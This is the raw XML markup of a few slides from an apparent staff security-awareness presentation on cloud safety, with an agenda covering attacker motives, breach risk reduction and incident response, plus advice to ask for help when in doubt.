                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A Test!</a:t>
            </a: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TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4655840" y="5276056"/>
            <a:ext cx="3816424" cy="720080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="4572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ysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>Coming</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-GB" sz="2400" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t> soon:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" kern="0" noProof="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>More tools - SOC</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891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7000">
              <a:schemeClr val="accent4"/>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="accent3"/>
            </a:gs>
          </a:gsLst>
          <a:lin ang="1800000"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bwMode="grayWhite">
          <a:xfrm>
            <a:off x="0" y="495302"/>
            <a:ext cx="12192000" cy="6172199"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Expect </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>That</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Someone</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>is trying </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To hack you</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2085140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flipH="1">
            <a:off x="6763482" y="1196752"/>
            <a:ext cx="5428517" cy="5695492"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Text Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>If in </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>doubt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ask</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>For </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>help</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4583832" y="3284984"/>
            <a:ext cx="2376264" cy="2880320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="45720" rtlCol="0">
            <a:noAutofit/>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ASOC</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Your lead</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Country lead</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Markos</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Project team</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kumimoji="0" lang="en-GB" sz="3600" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>ASOC</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kumimoji="0" lang="en-US" sz="36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5229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8"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1371600"/>
            <a:ext cx="11430000" cy="4689475"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="341311" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The imbalance of attacking versus defence</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="341311" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>What do hackers want to do?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="341311" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The imbalance of damage.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="341311" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>How to actually hack!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="341311" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>What does a security incident mean? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="341311" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>How can you reduce the risk of being breached?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="341311" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>How can you reduce the impacts of being hacked?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="341311" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>What to do if you’ve been hacked.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>talking about cloud safety</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="20"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Copyright 2017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5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="58383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unity-news-images.s3.amazonaws.com/uploads/540/FA-oversized-goals.png"/>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72752" y="0"/>
            <a:ext cx="14041560" cy="688538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14000" y="-1634249"/>
            <a:ext cx="13895102" cy="8654641"/>
            <a:chOff x="914000" y="-1634249"/>
            <a:chExt cx="13895102" cy="8654641"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="3" name="Picture 2"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4">
              <a:clrChange>
                <a:clrFrom>
                  <a:srgbClr val="ED1C24"/>
                </a:clrFrom>
                <a:clrTo>
                  <a:srgbClr val="ED1C24">
                    <a:alpha val="0"/>
                  </a:srgbClr>
                </a:clrTo>
              </a:clrChange>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="8616280" y="4869160"/>
              <a:ext cx="671355" cy="671355"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="Picture 5"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4">
              <a:clrChange>
                <a:clrFrom>
                  <a:srgbClr val="ED1C24"/>
                </a:clrFrom>
                <a:clrTo>
                  <a:srgbClr val="ED1C24">
                    <a:alpha val="0"/>
                  </a:srgbClr>
                </a:clrTo>
              </a:clrChange>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="8951957" y="3442692"/>
              <a:ext cx="671355" cy="671355"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="7" name="Picture 6"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4">
              <a:clrChange>
                <a:clrFrom>
                  <a:srgbClr val="ED1C24"/>
                </a:clrFrom>
                <a:clrTo>
                  <a:srgbClr val="ED1C24">
                    <a:alpha val="0"/>
                  </a:srgbClr>
                </a:clrTo>
              </a:clrChange>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4007768" y="4941168"/>
              <a:ext cx="671355" cy="671355"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="8" name="Picture 7"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4">
              <a:clrChange>
                <a:clrFrom>
                  <a:srgbClr val="ED1C24"/>
                </a:clrFrom>
                <a:clrTo>
                  <a:srgbClr val="ED1C24">
                    <a:alpha val="0"/>
                  </a:srgbClr>
                </a:clrTo>
              </a:clrChange>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="9672307" y="5260277"/>
              <a:ext cx="1030855" cy="1030855"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="9" name="Picture 8"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4">
              <a:clrChange>
                <a:clrFrom>
                  <a:srgbClr val="ED1C24"/>
                </a:clrFrom>
                <a:clrTo>
                  <a:srgbClr val="ED1C24">
                    <a:alpha val="0"/>
                  </a:srgbClr>
                </a:clrTo>
              </a:clrChange>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="10331487" y="2564904"/>
              <a:ext cx="1030855" cy="1030855"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="10" name="Picture 9"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4">
              <a:clrChange>
                <a:clrFrom>
                  <a:srgbClr val="ED1C24"/>
                </a:clrFrom>
                <a:clrTo>
                  <a:srgbClr val="ED1C24">
                    <a:alpha val="0"/>
                  </a:srgbClr>
                </a:clrTo>
              </a:clrChange>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1487488" y="3778369"/>
              <a:ext cx="1030855" cy="1030855"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="11" name="Picture 10"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4">
              <a:clrChange>
                <a:clrFrom>
                  <a:srgbClr val="ED1C24"/>
                </a:clrFrom>
                <a:clrTo>
                  <a:srgbClr val="ED1C24">
                    <a:alpha val="0"/>
                  </a:srgbClr>
                </a:clrTo>
              </a:clrChange>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7151757" y="3932614"/>
              <a:ext cx="399255" cy="399255"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="12" name="Picture 11"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4">
              <a:clrChange>
                <a:clrFrom>
                  <a:srgbClr val="ED1C24"/>
                </a:clrFrom>
                <a:clrTo>
                  <a:srgbClr val="ED1C24">
                    <a:alpha val="0"/>
                  </a:srgbClr>
                </a:clrTo>
              </a:clrChange>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4766488" y="2564904"/>
              <a:ext cx="399255" cy="399255"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="13" name="Picture 12"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4">
              <a:clrChange>
                <a:clrFrom>
                  <a:srgbClr val="ED1C24"/>
                </a:clrFrom>
                <a:clrTo>
                  <a:srgbClr val="ED1C24">
                    <a:alpha val="0"/>
                  </a:srgbClr>
                </a:clrTo>
              </a:clrChange>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2067304" y="5612523"/>
              <a:ext cx="399255" cy="399255"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="14" name="Picture 13"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4">
              <a:clrChange>
                <a:clrFrom>
                  <a:srgbClr val="ED1C24"/>
                </a:clrFrom>
                <a:clrTo>
                  <a:srgbClr val="ED1C24">
                    <a:alpha val="0"/>
                  </a:srgbClr>
                </a:clrTo>
              </a:clrChange>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6474327" y="4919633"/>
              <a:ext cx="1892867" cy="1892867"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="15" name="Picture 14"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4">
              <a:clrChange>
                <a:clrFrom>
                  <a:srgbClr val="ED1C24"/>
                </a:clrFrom>
                <a:clrTo>
                  <a:srgbClr val="ED1C24">
                    <a:alpha val="0"/>
                  </a:srgbClr>
                </a:clrTo>
              </a:clrChange>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="11248964" y="5127525"/>
              <a:ext cx="1892867" cy="1892867"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="16" name="Picture 15"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4">
              <a:clrChange>
                <a:clrFrom>
                  <a:srgbClr val="ED1C24"/>
                </a:clrFrom>
                <a:clrTo>
                  <a:srgbClr val="ED1C24">
                    <a:alpha val="0"/>
                  </a:srgbClr>
                </a:clrTo>
              </a:clrChange>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="914000" y="1702892"/>
              <a:ext cx="1892867" cy="1892867"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="17" name="Picture 16"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4">
              <a:clrChange>
                <a:clrFrom>
                  <a:srgbClr val="ED1C24"/>
                </a:clrFrom>
                <a:clrTo>
                  <a:srgbClr val="ED1C24">
                    <a:alpha val="0"/>
                  </a:srgbClr>
                </a:clrTo>
              </a:clrChange>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="9939235" y="4797151"/>
              <a:ext cx="261221" cy="261221"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="18" name="Picture 17"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4">
              <a:clrChange>
                <a:clrFrom>
                  <a:srgbClr val="ED1C24"/>
                </a:clrFrom>
                <a:clrTo>
                  <a:srgbClr val="ED1C24">
                    <a:alpha val="0"/>
                  </a:srgbClr>
                </a:clrTo>
              </a:clrChange>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="3030064" y="3706361"/>
              <a:ext cx="401100" cy="401100"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="19" name="Picture 18"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4">
              <a:clrChange>
                <a:clrFrom>
                  <a:srgbClr val="ED1C24"/>
                </a:clrFrom>
                <a:clrTo>
                  <a:srgbClr val="ED1C24">
                    <a:alpha val="0"/>
                  </a:srgbClr>
                </a:clrTo>
              </a:clrChange>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="8308485" y="3860606"/>
              <a:ext cx="155348" cy="155348"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="20" name="Picture 19"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4">
              <a:clrChange>
                <a:clrFrom>
                  <a:srgbClr val="ED1C24"/>
                </a:clrFrom>
                <a:clrTo>
                  <a:srgbClr val="ED1C24">
                    <a:alpha val="0"/>
                  </a:srgbClr>
                </a:clrTo>
              </a:clrChange>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="5923216" y="2492896"/>
              <a:ext cx="155348" cy="155348"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="21" name="Picture 20"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4">
              <a:clrChange>
                <a:clrFrom>
                  <a:srgbClr val="ED1C24"/>
                </a:clrFrom>
                <a:clrTo>
                  <a:srgbClr val="ED1C24">
                    <a:alpha val="0"/>
                  </a:srgbClr>
                </a:clrTo>
              </a:clrChange>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="3224032" y="5540515"/>
              <a:ext cx="155348" cy="155348"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="22" name="Picture 21"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4">
              <a:clrChange>
                <a:clrFrom>
                  <a:srgbClr val="ED1C24"/>
                </a:clrFrom>
                <a:clrTo>
                  <a:srgbClr val="ED1C24">
                    <a:alpha val="0"/>
                  </a:srgbClr>
                </a:clrTo>
              </a:clrChange>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4837870" y="-711158"/>
              <a:ext cx="3058330" cy="3058330"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="23" name="Picture 22"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4">
              <a:clrChange>
                <a:clrFrom>
                  <a:srgbClr val="ED1C24"/>
                </a:clrFrom>
                <a:clrTo>
                  <a:srgbClr val="ED1C24">
                    <a:alpha val="0"/>
                  </a:srgbClr>
                </a:clrTo>
              </a:clrChange>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm rot="3482661">
              <a:off x="9468636" y="2934105"/>
              <a:ext cx="470408" cy="470408"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="24" name="Picture 23"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4">
              <a:clrChange>
                <a:clrFrom>
                  <a:srgbClr val="ED1C24"/>
                </a:clrFrom>
                <a:clrTo>
                  <a:srgbClr val="ED1C24">
                    <a:alpha val="0"/>
                  </a:srgbClr>
                </a:clrTo>
              </a:clrChange>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm rot="3482661">
              <a:off x="7640712" y="3327201"/>
              <a:ext cx="279752" cy="279752"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="25" name="Picture 24"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4">
              <a:clrChange>
                <a:clrFrom>
                  <a:srgbClr val="ED1C24"/>
                </a:clrFrom>
                <a:clrTo>
                  <a:srgbClr val="ED1C24">
                    <a:alpha val="0"/>
                  </a:srgbClr>
                </a:clrTo>
              </a:clrChange>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm rot="3482661">
              <a:off x="5255443" y="1959491"/>
              <a:ext cx="279752" cy="279752"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="26" name="Picture 25"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4">
